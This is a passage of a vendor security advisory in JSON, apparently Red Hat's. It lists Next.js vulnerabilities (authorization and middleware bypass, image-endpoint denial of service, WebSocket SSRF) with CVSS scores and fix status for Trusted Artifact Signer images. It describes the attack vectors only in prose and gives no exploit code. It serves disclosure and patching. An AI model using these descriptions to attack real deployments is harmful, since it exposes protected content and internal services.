"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Authorization bypass via crafted query parameters"
},
{
"cve": "CVE-2026-44575",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-05-13T18:01:17.168356+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477188"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. App Router applications that use middleware or proxy-based authorization checks are vulnerable to unauthorized access. A remote attacker can exploit this by crafting specific .rsc and segment-prefetch URLs, which bypass the intended middleware rules. This allows access to protected content without proper authorization.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Unauthorized access to protected content via middleware bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in Next.js App Router applications that utilize middleware or proxy-based authorization. A remote attacker can bypass these security checks by crafting specific URLs, leading to unauthorized access to protected content. This is due to transport-specific route variants used for segment prefetching not being consistently matched by middleware rules.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44575"
},
{
"category": "external",
"summary": "RHBZ#2477188",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477188"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44575",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44575"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44575",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44575"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f"
}
],
"release_date": "2026-05-13T16:54:39.455000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Unauthorized access to protected content via middleware bypass"
},
{
"cve": "CVE-2026-44577",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T18:01:35.713847+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477194"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. When self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. A remote attacker could exploit this by requesting large local assets from the /_next/image endpoint. This can lead to out-of-memory conditions, resulting in a Denial of Service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Denial of Service via Image Optimization API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Next.js affects self-hosted applications utilizing the default image loader. A remote attacker can trigger a denial of service by requesting large local image assets, leading to out-of-memory conditions. This vulnerability is present when `images.localPatterns` is configured to allow all patterns by default, and is not applicable when using Vercel, a custom image loader, or `images.unoptimized: true`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44577"
},
{
"category": "external",
"summary": "RHBZ#2477194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477194"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44577",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44577"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44577",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44577"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh"
}
],
"release_date": "2026-05-13T17:00:02.786000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-09T11:43:10+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Denial of Service via Image Optimization API"
},
{
"cve": "CVE-2026-44578",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2026-05-13T18:01:13.729805+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477187"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Self-hosted applications utilizing the built-in Node.js server are vulnerable to Server-Side Request Forgery (SSRF) through specially crafted WebSocket upgrade requests. A remote attacker can exploit this by causing the server to proxy requests to arbitrary internal or external destinations. This could lead to the exposure of internal services or sensitive cloud metadata endpoints.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important severity flaw in Next.js affects self-hosted applications, including Red Hat AMQ, when using the built-in Node.js server. A remote attacker can exploit specially crafted WebSocket upgrade requests to perform Server-Side Request Forgery, potentially exposing internal network services or sensitive cloud metadata endpoints. This risk is specific to deployments where the origin server is directly exposed to untrusted networks.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64",
"Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64",
